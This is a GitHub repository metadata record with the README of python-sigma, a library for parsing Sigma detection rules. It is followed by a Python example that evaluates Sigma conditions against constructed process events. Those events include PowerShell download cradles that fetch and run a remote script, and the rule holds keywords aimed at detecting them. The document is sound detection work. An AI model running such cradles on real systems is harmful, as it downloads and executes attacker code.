{"id":17141717,"url":"https://github.com/calebstewart/python-sigma","last_synced_at":"2025-04-13T10:23:21.876Z","repository":{"id":41849383,"uuid":"455389808","full_name":"calebstewart/python-sigma","owner":"calebstewart","description":"Python API for interacting with sigma rules.","archived":false,"fork":false,"pushed_at":"2022-07-01T14:24:03.000Z","size":731,"stargazers_count":50,"open_issues_count":1,"forks_count":5,"subscribers_count":8,"default_branch":"main","last_synced_at":"2025-03-27T01:47:35.232Z","etag":null,"topics":["blueteam","cyber","detection","security","sigma"],"latest_commit_sha":null,"homepage":"https://sigma.calebstew.art/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/calebstewart.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-02-04T01:43:44.000Z","updated_at":"2025-01-30T19:43:58.000Z","dependencies_parsed_at":"2022-08-11T19:20:40.637Z","dependency_job_id":null,"html_url":"https://github.com/calebstewart/python-sigma","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/calebstewart%2Fpython-sigma","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/calebstewart%2Fpython-sigma/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/calebstewart%2Fpython-sigma/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/calebstewart%2Fpython-sigma/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/calebstewart","download_url":"https://codeload.github.com/calebstewart
/python-sigma/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248696281,"owners_count":21147097,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["blueteam","cyber","detection","security","sigma"],"created_at":"2024-10-14T20:26:18.869Z","updated_at":"2025-04-13T10:23:21.849Z","avatar_url":"https://github.com/calebstewart.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Python Sigma Rule Parsing Library\n\nThis library attempts to abstract the handling of Sigma rules in Python.\nThe rules are parsed using a schema defined with `pydantic`, and can be\neasily loaded from YAML files into a structured Python object.\n\n```py\nfrom sigma.schema import Rule\n\n# Load a rule into a python object\nrule = Rule.from_yaml(\"test-rule.yml\")\n\n# Simple properties are accessible directly\nprint(rule.title)\nprint(rule.author)\n\n# Detection conditions are also available unchanged\nprint(rule.detection.condition)\nprint(rule.detection.my_condition_name)\n\n# Parsed/unified grammar from the condition is easy!\nprint(rule.detection.expression)\n```\n\nThis project is under active development, and this readme may or may not\nreflect the most up-to-date documentation. 
In general, you should refer\nto the generated documentation (instructions for building below) and the\ncommand-line help output for details until the library/tools reach a\nstable state.\n\n## Installation\n\nThe library and command line interface can be installed using `pip` from\nGitHub with:\n\n``` sh\n# Install directly from GitHub\npip install git+ssh://git@github.com/calebstewart/python-sigma.git\n\n# Check out the repo, then install\ngit clone git@github.com:calebstewart/python-sigma.git\ncd python-sigma\npip install .\n```\n\nIf you would like to participate in development, you should use Python\nPoetry to manage your virtual environment and dependencies. For more\ninformation see [the Poetry documentation](https://python-poetry.org/docs/).\n\n``` sh\n# Set up the Python development environment\ngit clone git@github.com:calebstewart/python-sigma.git\ncd python-sigma\npoetry install\n\n# Enter the virtual environment to interact with the package\npoetry shell\n\n# Type \"exit\" to leave the poetry virtual environment\n```\n\n## Documentation\n\nDocumentation can be built using Sphinx from this repository. First,\ninstall the package with the documentation dependencies, then run\n`make html` from the `docs/` directory:\n\n``` sh\n# Install with the docs extras\npoetry install -E docs\n\n# Enter the poetry virtual environment\npoetry shell\n\n# Build the documentation\ncd docs\nmake html\n\n# Open the documentation in docs/_build/index.html\n```\n\nAt this time, documentation is built automatically from docstrings and\ntype-hinting in the project code itself. The plan is to eventually augment\nthis auto-generated documentation, but that is a project for later after\nthe API and CLI interfaces solidify. 
That being said, extensive examples\nand documentation have been added where appropriate using module docstrings\nthroughout the project, so the documentation should at least be usable.\n\n## Command Line Interface\n\nThere is a command line interface exposed by the entrypoint `sigma` which\nis installed with this package. The `sigma` command provides subcommands\nfor inspecting rule and configuration schema, viewing/updating the MITRE\nATT\u0026CK database cache, validating serializer or rule configurations, and\nconverting rules using built-in or custom serializers.\n\nThis project is still under active development, and the interface could\nchange at any time. You should check the built-in help by running\n`sigma --help` at the command line; however, for completeness' sake, the\ncurrent help output/list of subcommands is:\n\n``` sh\n$ sigma --help\nUsage: sigma [OPTIONS] COMMAND [ARGS]...\n\n  Sigma Rule conversion and validation CLI.\n\nOptions:\n  --help  Show this message and exit.\n\nCommands:\n  convert    Convert Sigma rules to various formats using built-in or...\n  list       List built-in transforms and serializers\n  mitre      Browse and update the MITRE ATT\u0026CK data cache\n  schema     Dump the schema for rules, serializers, and transforms\n  transform  Transform a list of rules using a list of transforms in a...\n  validate   Validate Sigma rule or serializer schema\n```\n\n## But... why?\n\nThe official Sigma repository contains the `sigmac` tool for converting\nsigma rules from sigma format to a variety of backend detection systems.\nHowever, this tool has aged poorly. The code is messy and hard to follow\nand documentation is limited. It appears the Sigma team is attempting to\nreplace `sigmac` with [pySigma](https://github.com/SigmaHQ/pySigma), but\nthe project is pretty new, and I wanted something I could iterate on and\nhave control over in the short term.\n\nAlso, the processing of sigma rules simply seems overly complex in both\ncases. 
This may be a \"grass is greener\" problem on my part, but the worst\ncase for me doing this is that I better understand the problems inherent\nin building a Sigma rule API/converter, and can hopefully give back to the\ncommunity in some way in the future.\n\nLastly, I wanted to build this tool with a focus on modern API interfaces\nand aggressive documentation. I plan to utilize `pydantic` heavily to make\nvalidation of fields and values more straightforward and pythonic as well\nas provide a simple interface for others to ingest Sigma rules directly.\nFor example, being able to load, inspect and possibly modify sigma rules\nfrom Python without using the conversion tool would be a great feature for\nteams trying to work Sigma into their automation pipeline.\n\nAll that being said, I want to be abundantly clear: **The sigma project\nand all the code associated with it have been immensely helpful, and the\nabove is not meant to dig on the team, their code or their contributions\nto the community.** I greatly appreciate and admire all the hard work\nthe SigmaHQ team has put into making the detection of malicious activity\nbetter over the years. I only hope that I can either learn something or\nmaybe provide something useful back to the community myself. :smile:\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcalebstewart%2Fpython-sigma","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcalebstewart%2Fpython-sigma","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcalebstewart%2Fpython-sigma/lists"}
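The README above shows `rule.detection.expression` handing back the rule's `condition` as a parsed tree rather than a string; what a consumer does with such a tree is evaluate it over events. The following is an added example and is not python-sigma's code or API: a stdlib-only parser for a subset of the Sigma condition grammar (`and`/`or`/`not`, parentheses, `N of` and `all of` over `them` or a selection glob) plus the `contains`, `startswith`, `endswith` and `all` value modifiers, run over a constructed rule and three constructed process-creation events. `RULE`, `EVENTS`, `ConditionParser`, `compile_selection` and `matching_indices` are names chosen here; the rule is assumed to be already loaded into a dict, and aggregation conditions (`| count() ...`) are rejected rather than guessed at.

```python
"""Added example, not python-sigma's code: a dependency-free evaluator for a
Sigma rule's parsed condition. Assumes the rule is already a dict, the condition
is one string (and/or/not, parentheses, `N of`/`all of`) and has no aggregation."""
import fnmatch
import re
from typing import Any, Callable, Dict, List, Optional

Matcher = Callable[[Dict[str, Any]], bool]
TOKEN_RE = re.compile(r"\(|\)|[A-Za-z0-9_*]+")  # parens, keywords, numbers, names/globs
_OPS = {"contains": lambda a, e: e in a, "startswith": str.startswith,
        "endswith": str.endswith}  # Sigma value modifiers; default is wildcard equality

# Constructed rule and events (not real telemetry), shaped like process_creation data.
RULE = {"detection": {
    "selection": {"Image|endswith": "\\powershell.exe",
                  "CommandLine|contains": ["DownloadString", "Invoke-Expression", "IEX"]},
    "filter_system": {"User|startswith": "NT AUTHORITY\\"}, "condition": "selection and not filter_system"}}
EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "User": "CORP\\jdoe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://updates/a.ps1')"},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "User": "CORP\\jdoe", "CommandLine": "cmd /c whoami"},
]

def _field_matcher(key: str, expected: Any) -> Matcher:
    """`Field|modifier...: value(s)`; Sigma string matching is case-insensitive."""
    field, *mods = key.split("|")
    op = next((_OPS[m] for m in mods if m in _OPS), fnmatch.fnmatchcase)  # plain value: '*'/'?' allowed
    values = [str(v).lower() for v in (expected if isinstance(expected, list) else [expected])]
    combine = all if "all" in mods else any  # a value list is OR unless the |all modifier is present
    def match(ev: Dict[str, Any]) -> bool:
        actual = ev.get(field)
        return actual is not None and combine(op(str(actual).lower(), v) for v in values)
    return match

def compile_selection(spec: Any) -> Matcher:
    """A mapping is an AND of its fields; a list of mappings is an OR of them."""
    if isinstance(spec, list):
        parts = [compile_selection(item) for item in spec]
        return lambda ev: any(p(ev) for p in parts)
    parts = [_field_matcher(k, v) for k, v in spec.items()]
    return lambda ev: all(p(ev) for p in parts)

class ConditionParser:
    """Recursive descent over the condition tokens; precedence: or < and < not/atom."""
    def __init__(self, condition: str, selections: Dict[str, Matcher]):
        self.tokens, self.pos, self.selections = TOKEN_RE.findall(condition), 0, selections
    def _peek(self) -> Optional[str]:
        return self.tokens[self.pos] if self.pos < len(self.tokens) else None
    def _next(self) -> str:
        if self.pos >= len(self.tokens):
            raise ValueError("unexpected end of condition")
        self.pos += 1
        return self.tokens[self.pos - 1]
    def parse(self) -> Matcher:
        matcher = self._expr()
        if self._peek() is not None:  # e.g. an aggregation `| count() ...`, which is not supported here
            raise ValueError(f"unexpected token {self._peek()!r}")
        return matcher
    def _expr(self) -> Matcher:
        return self._chain("or", lambda: self._chain("and", self._atom))
    def _chain(self, keyword: str, sub: Callable[[], Matcher]) -> Matcher:
        parts = [sub()]
        while self._peek() == keyword:  # left-associative `sub (keyword sub)*`
            self._next()
            parts.append(sub())
        combine = any if keyword == "or" else all
        return lambda ev: combine(p(ev) for p in parts)
    def _atom(self) -> Matcher:
        tok = self._next()
        if tok == "(":
            inner = self._expr()
            if self._next() != ")":
                raise ValueError("expected ')'")
            return inner
        if tok == "not":
            inner = self._atom()
            return lambda ev: not inner(ev)
        if tok == "all" or tok.isdigit():  # `all of them`, `1 of selection_*`, ...
            if self._next() != "of":
                raise ValueError("expected 'of'")
            pattern = self._next()
            names = list(self.selections) if pattern == "them" else fnmatch.filter(self.selections, pattern)
            if not names:  # a mistyped glob would otherwise match nothing, silently
                raise ValueError(f"no selection matches {pattern!r}")
            need = len(names) if tok == "all" else int(tok)
            return lambda ev: sum(self.selections[n](ev) for n in names) >= need
        if tok not in self.selections:
            raise ValueError(f"unknown selection {tok!r}")
        return self.selections[tok]

def matching_indices(rule: Dict[str, Any], events: List[Dict[str, Any]]) -> List[int]:
    """Compile the rule's detection block and return the indices of matching events."""
    det = rule["detection"]
    selections = {k: compile_selection(v) for k, v in det.items() if k != "condition"}
    matcher = ConditionParser(det["condition"], selections).parse()
    return [i for i, ev in enumerate(events) if matcher(ev)]
```

`matching_indices(RULE, EVENTS)` returns `[0]`: the SYSTEM-owned cradle is dropped by `filter_system`, and the cmd.exe event never satisfied `selection`. A glob in `1 of selection_*` that matches no selection raises instead of silently matching nothing, which is the failure mode to watch for when a selection is renamed during a rule refactor.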